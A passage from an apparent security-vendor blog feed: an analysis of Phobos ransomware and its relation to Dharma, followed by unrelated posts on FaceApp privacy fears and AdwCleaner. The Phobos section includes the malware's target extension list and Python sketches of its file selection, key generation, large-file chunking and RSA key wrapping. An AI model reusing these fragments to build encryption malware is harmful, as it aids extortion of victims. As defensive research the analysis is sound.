1cd 3ds 3fr 3g2 3gp 7z accda accdb accdc accde accdt accdw adb adp ai ai3 ai4 ai5 ai6 ai7 ai8 anim arw as asa asc ascx asm asmx asp aspx asr asx avi avs backup bak bay bd bin bmp bz2 c cdr cer cf cfc cfm cfml cfu chm cin class clx config cpp cr2 crt crw cs css csv cub dae dat db dbf dbx dc3 dcm dcr der dib dic dif divx djvu dng doc docm docx dot dotm dotx dpx dqy dsn dt dtd dwg dwt dx dxf edml efd elf emf emz epf eps epsf epsp erf exr f4v fido flm flv frm fxg geo gif grs gz h hdr hpp hta htc htm html icb ics iff inc indd ini iqy j2c j2k java jp2 jpc jpe jpeg jpf jpg jpx js jsf json jsp kdc kmz kwm lasso lbi lgf lgp log m1v m4a m4v max md mda mdb mde mdf mdw mef mft mfw mht mhtml mka mkidx mkv mos mov mp3 mp4 mpeg mpg mpv mrw msg mxl myd myi nef nrw obj odb odc odm odp ods oft one onepkg onetoc2 opt oqy orf p12 p7b p7c pam pbm pct pcx pdd pdf pdp pef pem pff pfm pfx pgm php php3 php4 php5 phtml pict pl pls pm png pnm pot potm potx ppa ppam ppm pps ppsm ppt pptm pptx prn ps psb psd pst ptx pub pwm pxr py qt r3d raf rar raw rdf rgbe rle rqy rss rtf rw2 rwl safe sct sdpx shtm shtml slk sln sql sr2 srf srw ssi st stm svg svgz swf tab tar tbb tbi tbk tdi tga thmx tif tiff tld torrent tpl txt u3d udl uxdc vb vbs vcs vda vdr vdw vdx vrp vsd vss vst vsw vsx vtm vtml vtx wb2 wav wbm wbmp wim wmf wml wmv wpd wps x3f xl xla xlam xlk xlm xls xlsb xlsm xlsx xlt xltm xltx xlw xml xps xsd xsf xsl xslt xsn xtp xtp2 xyze xz zip
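Putting the lists together, the selection logic can be approximated as follows. The lists are abbreviated to a few illustrative entries, and the exact matching rules (e.g., how subdirectories of C:\Windows are handled) are an assumption:

```python
# Condensed sketch of the target-selection rules: skip blacklisted names
# and the ransom notes, skip C:\Windows, skip files already carrying a
# known Phobos-family extension, and encrypt only whitelisted extensions.
NAME_BLACKLIST = {"info.txt", "info.hta", "boot.ini", "ntldr"}
PHOBOS_EXTS = {"acute", "actin", "phobos", "phoenix", "mamba"}
WHITELIST = {"doc", "docx", "xls", "jpg", "png", "pdf", "txt", "zip"}

def should_encrypt(path: str) -> bool:
    path = path.lower()
    folder, _, name = path.rpartition("\\")
    if name in NAME_BLACKLIST or folder.startswith("c:\\windows"):
        return False
    ext = name.rsplit(".", 1)[-1]
    if ext in PHOBOS_EXTS:        # already encrypted by this family
        return False
    return ext in WHITELIST

print(should_encrypt("c:\\users\\bob\\report.docx"))  # True
print(should_encrypt("c:\\windows\\system.ini"))      # False
```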

How does the encryption work

Phobos uses the Windows Crypto API for file encryption. Several parallel threads deploy the encryption, one per accessible disk or network share.

Deploying the encrypting thread

The AES key is created before the encrypting thread is run, and is passed in the thread parameter.

Fragment of the key generation function:

Calling the function generating the AES key (32 bytes)

Although the AES key is common to all files encrypted in a single round, each file is encrypted with a different initialization vector. The IV is 16 bytes long, generated just before the file is opened, and then passed to the encrypting function:

Calling the function generating the AES IV (16 bytes)

Underneath, the AES key and the initialization vector are both generated by the same function, a wrapper around CryptGenRandom (a cryptographically strong random generator):
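In Python terms, the wrapper behaves like this sketch, with the `secrets` module standing in for CryptGenRandom:

```python
import secrets

# One 32-byte AES key per encryption round, one fresh 16-byte IV per file,
# both drawn from a cryptographically strong source.
def random_bytes(n: int) -> bytes:
    return secrets.token_bytes(n)

aes_key = random_bytes(32)              # shared by all files in this round
iv_for_one_file = random_bytes(16)      # unique per file
print(len(aes_key), len(iv_for_one_file))  # 32 16
```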

The AES IV is later appended to the content of the encrypted file in cleartext form, as we can see in the following example:

Before the file encryption function is executed, the random IV is generated:

The AES key that was passed to the thread is imported into the context (CryptImportKey), and the IV is set. We can see the file content being encrypted after it is read:

After the content of the file is encrypted, it is saved into a newly created file with the ransomware extension.

The ransomware creates a block of metadata, including checksums and the original file name. After this block, the random IV is stored, followed by the block containing the encrypted AES key. The last element is the file marker: “LOCK96”:

Before being written to the file, the metadata block is encrypted using the same AES key and IV as the file content.

setting the AES key before encrypting the metadata block

Encrypted metadata block:

Finally, the content is appended to the end of the newly created file:

A common question ransomware researchers want to answer is whether the ransomware is decryptable – that is, whether it contains a weakness that would allow victims to recover their files without paying the ransom. The first thing to look at is how the file encryption is implemented. Unfortunately, as the above analysis shows, the encryption algorithm used is secure: AES with a random key and initialization vector, both created by a secure random generator. The implementation is also valid, as the authors decided to use the Windows Crypto API.

Encrypting big files

Phobos uses a different algorithm to encrypt big files (above 0x180000 bytes). The algorithm explained above is used for files of typical size, in which case the full file is encrypted from beginning to end. For big files, the main algorithm is similar, but only selected parts of the content are encrypted.

We can see this in the following example. The file ‘test.bin’ was filled with 0xAA bytes. Its original size was 0x77F87FF:

After being encrypted with Phobos, we see the following changes:

Some fragments of the file have been left unencrypted. Between them, starting from the beginning, some fragments are wiped. A random-looking block of bytes has been appended to the end of the file, after the original size; we can guess that this is the encrypted content of the wiped fragments. At the very end of the file, we can see a block of data typical for Phobos:

Looking inside the code, we can see the reason for this alignment: only three chunks of the large file are read into a buffer, each 0x40000 bytes long:

All the chunks read are merged into one buffer. After this content, the usual metadata (checksums, original file name) is added, and the full buffer is encrypted:

In this way, the authors of Phobos minimize the time taken to encrypt large files while maximizing the damage done.
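Assuming the three chunks are spread evenly across the file (the exact offsets are not confirmed by the analysis above), the read step can be sketched as:

```python
import io

# Sketch of the big-file strategy: read three 0x40000-byte chunks from a
# file larger than 0x180000 bytes and merge them into one buffer. Only the
# reading step is shown, not the wiping or encryption.
CHUNK = 0x40000
BIG_FILE_THRESHOLD = 0x180000

def read_chunks(f, size, n=3):
    step = (size - CHUNK) // (n - 1)   # evenly spaced offsets, first at 0
    chunks = []
    for i in range(n):
        f.seek(i * step)
        chunks.append(f.read(CHUNK))
    return b"".join(chunks)            # merged buffer to be encrypted

fake = io.BytesIO(b"\xAA" * 0x77F87FF)  # stand-in for the 'test.bin' example
buf = read_chunks(fake, 0x77F87FF)
print(hex(len(buf)))  # 0xc0000
```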

How is the AES key protected

The next element that we need to check in order to analyze decryptability is the way in which the authors decided to store the generated key.

In the case of Phobos, the AES key is encrypted just after being created. Its encrypted form is later appended to the end of the attacked file (in the aforementioned 128-byte block). Let’s take a closer look at the function responsible for encrypting the AES key.

The function that generates and protects the AES key is deployed before each encrypting thread is started. Looking inside, we can see that several variables are first decrypted, in the same way as the aforementioned strings.

Decryption of the constants

One of the decrypted elements is the following buffer:

It turns out that the decrypted 128-byte block is the attacker’s public RSA key. This buffer is then verified with the help of a checksum: a checksum of the RSA key is compared with a hardcoded one. If both match, the size used for AES key generation is set to 32; otherwise, it is set to 4.

Then, a buffer of random bytes is generated for the AES key.

After being generated, the AES key is protected with the hardcoded public key. This time the authors decided not to use the Windows Crypto API, but an external library. Detailed analysis helped us identify it as a specific implementation of the RSA algorithm (special thanks to Mark Lechtik for the help).

The decrypted 128-byte RSA key is imported with the function RSA_pub_key_new. After that, the imported key is used to encrypt the random AES key:
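Schematically, with textbook toy RSA numbers in place of the real 1024-bit key (a sketch of the concept, not the library’s actual API):

```python
# Toy RSA from the textbook example (p=61, q=53); the real attacker key
# is a 1024-bit modulus decrypted from the binary.
n, e = 3233, 17          # public key, shipped inside the malware
d = 2753                 # attacker-held private exponent

aes_key_int = 65                       # stand-in for the 32-byte AES key
protected = pow(aes_key_int, e, n)     # value stored in the file trailer
recovered = pow(protected, d, n)       # only possible with d
print(protected, recovered)            # 2790 65
```

Because only the attacker holds d, the per-round AES key in each file trailer cannot be recovered by the victim, which is what makes the scheme sound from the attacker's perspective.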

Summing up, the AES key seems to be protected correctly, which is bad news for the victims of this ransomware.

Attacking network shares

Phobos has a separate thread dedicated to attacking network shares.

Network shares are enumerated in a loop:

Comparison with Dharma

Previous sources have referenced Phobos as strongly based on Dharma ransomware. However, that comparison was based mostly on outward appearance: a very similar ransom note and the naming convention used for encrypted files. The real answer to this question lies in the code. Let’s compare the two, using the current sample of Phobos and a Dharma sample (d50f69f0d3a73c0a58d2ad08aedac1c8).

If we compare both with the help of BinDiff, we can see some similarities, but also a lot of mismatching functions.

Fragment of code comparison: Phobos vs Dharma

In contrast to Phobos, Dharma loads the majority of its imports dynamically, making the code a bit more difficult to analyze.

Dharma loads most of its imports at the beginning of execution

Addresses of the imported functions are stored in an additional array, and every call takes an additional jump to the value of this array. Example:

In contrast, Phobos has a typical, unobfuscated Import Table.

Before the encryption routine is started, Dharma sets a mutex: “Global\syncronize_<hardcoded ID>”.

Both Phobos and Dharma use the same implementation of the RSA algorithm, from a static library. Fragment of code from Dharma:

Fragment of the function “bi_mod_power”:

File encryption is implemented similarly in both. However, while Dharma uses AES implementation from the same static library, Phobos uses AES from Windows Crypto API.

Fragment of the AES implementation from Dharma ransomware

Looking at how the key is saved in the file, we can also see some similarities. The protected AES key is stored in a block at the end of the encrypted file. At the beginning of this block, we can see some metadata similar to Phobos’s, for example the original file name (in Phobos this data is encrypted). Then there is a six-character-long identifier, selected from a hardcoded pool.

The block at the end of a file encrypted by Dharma

Such an identifier also occurs in Phobos, but there it is stored at the very end of the block. In the case of Phobos, this identifier is constant for a particular sample.
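Extracting that trailing identifier could be sketched as below; the block size and offsets are hypothetical, since the only detail established above is that Phobos keeps the identifier at the very end of the block:

```python
def phobos_sample_id(encrypted_file: bytes, block_size: int = 16) -> str:
    """
    Pull the six-character identifier from the end of the metadata
    block appended to an encrypted file. The block_size default is a
    placeholder; real Phobos blocks carry more (encrypted) metadata.
    """
    block = encrypted_file[-block_size:]
    # Phobos: identifier sits at the very end of the trailing block.
    # (Dharma instead keeps it among the metadata near the block's start.)
    return block[-6:].decode("ascii", errors="replace")
```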

The block at the end of a file encrypted by Phobos

Conclusion

Phobos is an average piece of ransomware, by no means showing any novelty. Looking at its internals, we can conclude that while it is not an exact rip-off of Dharma, there are significant similarities between the two, suggesting the same authors. The overlap is at the conceptual level, as well as in the use of the same RSA implementation.

As with other threats, it is important to make sure your assets are secure to prevent such compromises. In this particular case, businesses should review any machines where Remote Desktop Protocol (RDP) access has been enabled, and either disable it if it is not needed, or make sure the credentials are strong enough to withstand brute-forcing.

Malwarebytes for business protects against Phobos ransomware via its Anti-Ransomware protection module:

The post A deep dive into Phobos ransomware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

FaceApp scares point to larger data collection problems

Malwarebytes - Wed, 07/24/2019 - 16:38

Last week, if you thumbed your way through Facebook, Instagram, and Twitter, you likely saw altered photos of your friends with a few extra decades written onto their faces—wrinkles added, skin sagged, hair bereft of color.

Has 2019 really been that long? Not really.

The photos are the work of FaceApp, the wildly popular, AI-powered app that lets users “age” pictures of themselves, change their hairstyles, put on glasses, and present a different gender.

Then, seemingly overnight, users, media reports, and members of Congress turned FaceApp into the latest privacy parable: If you care about your online privacy, avoid this app at all costs, they said.  

It’s operated by the Russian government, suggested the investigative outlet Forensic News.

It’s a coverup to train advanced facial recognition software, theorized multiple Twitter users.

It’s worthy of an FBI investigation, said Senator Chuck Schumer of New York.

The truth is less salacious. Here’s what we do know.

FaceApp’s engineers work out of St. Petersburg, Russia, which is not by any means a mark against the company. FaceApp does not, as previously claimed, upload a user’s entire photo roll to servers anywhere in the world. FaceApp’s Terms of Service agreement does not claim to transfer the ownership of a user’s photos to the company, and FaceApp’s CEO said the company would soon update its agreement to more accurately describe that the company does not utilize user content for “commercial purposes.”

Finally, the blowback against FaceApp—for what the company could collect, per its privacy policy, and how it could use that data—is a bit skewed. Countless American companies allow themselves to do the same exact thing today.

“The language you quoted to me, I recommend you look at the terms on Facebook or any other sort of user-generated service, like YouTube,” said Mitch Stoltz, senior staff attorney at Electronic Frontier Foundation, when we read FaceApp’s agreement to him over the phone.  

“It’s almost word-for-word,” Stoltz said. “All that verbiage, in a vacuum, sounds broad, but if you think about it, those are the terms used by almost any website that allows users to upload photos.”

But the takeaway from this week of near-hysteria should not be complacency. Instead, the story of FaceApp should serve as yet another example supporting the always-relevant, sometimes-boring guideline for online privacy: Ask questions first, download later (if at all).

FaceApp’s terms of service agreement

When users download and use FaceApp, they are required to agree to the parent company’s broad Terms of Service agreement. Those terms are extensive:

“You grant FaceApp a perpetual, irrevocable, nonexclusive, royalty-free, worldwide, fully-paid, transferable sub-licensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, publicly perform and display your User Content and any name, username or likeness provided in connection with your User Content in all media formats and channels now known or later developed, without compensation to you.”

Further, users are told through the Terms of Service agreement that “by using the Services, you agree that the User Content may be used for commercial purposes.”

This covers, to put it lightly, a lot. But it is far from unique, Stoltz said.  

“Any website that allows anyone in the world to post photos is going to have a clause like that—‘by uploading photos you give us permissions to do anything with it,’” Stoltz said. “It protects them against all manner of users trying to bring legal claims, where, oh, they only wanted four copies of a photo, not 10 copies. The possibilities are endless.”

Several years ago, CNN dug through some of the most dictatorial terms of service agreements for popular social media platforms, Internet services, and companies, and found that, for example, LinkedIn claimed it could profit from users’ ideas.

Relatedly, Terms of Service, Didn’t Read, which evaluates companies’ user agreements, currently shows that Google and Facebook can use users’ identities in advertisements shown to other users, and that the two companies can also track your online activity across other websites.

Stoltz also clarified that FaceApp’s Terms of Service agreement does not claim to take the copyright of a photo away from whoever took that photo—a process that would be difficult to do in a contract.

“It’s been tried—it’s something the courts don’t like,” Stoltz said.

Stoltz also said that, while consumers do have the option to bring a legal challenge against a contract they allege is unfair, such successful challenges are rare. Stoltz gave one example of where that worked, though: a judge sided with a rental car customer who challenged a company’s extra charge every time the driver sped past the speed limit.

“The court said nuh-uh, you can’t bury that in a contract and expect people to fully understand that,” Stoltz said.

As to how FaceApp will actually use user-generated photos, FaceApp CEO Yaroslav Goncharov told Malwarebytes Labs in an email that the company plans to update its terms to better reflect that it does not use any users’ images for “commercial purposes.”

“Even though our policy reserves potential ‘commercial use,’ we don’t use it for any commercial purposes,” Goncharov said. “We are planning to update our privacy policy and TC to reflect this fact.”

Dispelling the rumors

On July 17, United States Sen. Schumer asked the FBI and the Federal Trade Commission to investigate FaceApp because of the app’s popularity, the location of its parent company, and its alleged potential link to foreign intelligence operations in Russia.

The next day, Sen. Schumer spoke directly to consumers in a video shared on Twitter, hammering on the same points:

“The risk that your facial data could also fall into the hands of something like Russian intelligence, or the Russian military apparatus, is disturbing,” Schumer said.

But, according to FaceApp’s CEO, that isn’t true. In responding to questions from The Washington Post, Goncharov said the Russian government has no access to user photos, and, further, that unless a user actually lives in Russia, user data is not located in the country.

Goncharov also told The Washington Post that user photos processed by FaceApp are stored on servers run by Google and Amazon.

In responding to questions from Malwarebytes Labs, Goncharov clarified that the company removes photos from those servers based on a timer, but that sometimes, if there is a large quantity of photos, the removal process can actually take longer than the chosen time limit itself.

“You can set a policy for an [Amazon Simple Storage] bucket that says ‘delete all files that are older than one day.’ In this case, almost all photos may be deleted in 25 hours or so. However, if you have too many incoming photos it can take longer than one hour (or even 24 hours) to delete all photos that are older than 24 hours,” Goncharov said. “[Amazon Web Services] doesn’t provide a guarantee that it takes less than a day to complete a bucket policy. We have a similar situation with Google Cloud.”
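The kind of bucket policy Goncharov describes can be expressed as an S3 lifecycle rule. The rule ID and the boto3 call shown in comments are illustrative assumptions, not FaceApp's actual configuration:

```python
# A minimal sketch of an "expire objects older than one day" policy.
# S3 evaluates lifecycle rules asynchronously, which is exactly why
# deletion can lag behind the 24-hour mark under heavy upload volume.
lifecycle_rule = {
    "Rules": [
        {
            "ID": "expire-uploaded-photos",   # hypothetical rule name
            "Status": "Enabled",
            "Filter": {"Prefix": ""},         # apply to every object
            "Expiration": {"Days": 1},        # delete after ~24 hours
        }
    ]
}

# Applying it would look like this (requires boto3 and AWS credentials):
#   import boto3
#   s3 = boto3.client("s3")
#   s3.put_bucket_lifecycle_configuration(
#       Bucket="faceapp-uploads",             # hypothetical bucket name
#       LifecycleConfiguration=lifecycle_rule,
#   )
```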

Another concern that some users raised about FaceApp was the possibility that the app was accessing and downloading every photo locally stored on a user’s device.

But, again, the rumors proved to be overblown. Cybersecurity researchers and an investigation by Buzzfeed News revealed that the network traffic between FaceApp and its servers did not show any nefarious hoovering of user data.

“We didn’t see any suspicious increase in the size of outbound traffic that would indicate a leak of data beyond permitted uploads,” Buzzfeed News wrote. “We uploaded four pictures to FaceApp, which corresponds with the four spikes in the graphic, with some noise at the end after the fourth upload.”

Finally, despite the many distressed comments on Twitter, Goncharov also told The Washington Post that his company is not using its technology for any facial recognition purposes.

What you should do

We get it—FaceApp is fun. Sadly, for many, online privacy is less so. (We disagree.) But that does not make online privacy any less important.

For those of you who have already downloaded and used FaceApp, the company recently described an ad-hoc method for removing your data from their servers:

“We accept requests from users for removing all their data from our servers. Our support team is currently overloaded, but these requests have our priority. For the fastest processing, we recommend sending the requests from the FaceApp mobile app using ‘Settings->Support->Report a bug’ with the word ‘privacy’ in the subject line. We are working on the better UI for that.”

For those of you who want to avoid these types of problems in the future, there’s a simple rule: Read an app’s terms of service agreement and privacy policy before you download and use it. If the agreements and policies are too long to read through—or too filled with jargon to parse—you can always avoid downloading the app altogether.

Always remember, the fear of missing out on the latest online craze should be weighed against the fear of having your online privacy potentially invaded.

The post FaceApp scares point to larger data collection problems appeared first on Malwarebytes Labs.

Your device, your choice: AdwCleaner now detects preinstalled software

Malwarebytes - Tue, 07/23/2019 - 21:40

For years, Malwarebytes has held firm to a core belief about you, the user: You should be able to decide for yourself which apps, programs, browsers, and other software end up on your computer, tablet, or mobile phone.

Basically, it’s your device, your choice.

With the latest update to Malwarebytes AdwCleaner, we are working to further cement that belief into reality. AdwCleaner 7.4.0 now detects preinstalled software.

What is preinstalled software? It is software that typically comes preloaded on a new computer, separate from the operating system. Most preinstalled software is not necessary for the proper functioning of your computer. In fact, in some cases, it may degrade the computer’s performance by consuming memory, CPU, and hard drive resources.

Preinstalled software can be the manufacturer-provided systems control panel. It can be the long-outdated antivirus scanner. It can be the never-heard-of photo editor, the wedged-in social gaming platform, the all-too-sticky online comparison shopper. 

So, why remove it? Besides the potential for performance impacts, we simply feel that when you buy a device—whether that’s a laptop for school, work, or fun—you should have the right to choose which programs are installed. That right should also apply to the types of software that can show up preinstalled on a device, before you even have a say in the matter.

Preinstalled software applications can be difficult to remove. They linger, buzzing around your digital environment while dodging simple uninstall attempts. We want to change that.

We also want to be clear here: Preinstalled software is not malicious. Instead, for some users, preinstalled applications serve more as an annoyance.

Advanced users typically prefer to remove all non-essential applications from their systems. With the latest version of AdwCleaner, we extend that capability to users of all technical abilities. AdwCleaner now allows users the option to quarantine and uninstall unnecessary, sometimes performance-degrading, preinstalled applications.

Is there a pre-packaged app that is not necessary for your machine to run? You have the option to get rid of it. Is there a pre-installed, superfluous program taking up vital space on your computer? Feel free to get rid of it.
And if you remove a preinstalled application by mistake, the newest version of AdwCleaner allows you to completely restore it from the quarantine.

You should be able to choose the programs that end up on your device. With the latest update to Malwarebytes AdwCleaner, that choice is in closer reach.

The post Your device, your choice: AdwCleaner now detects preinstalled software appeared first on Malwarebytes Labs.
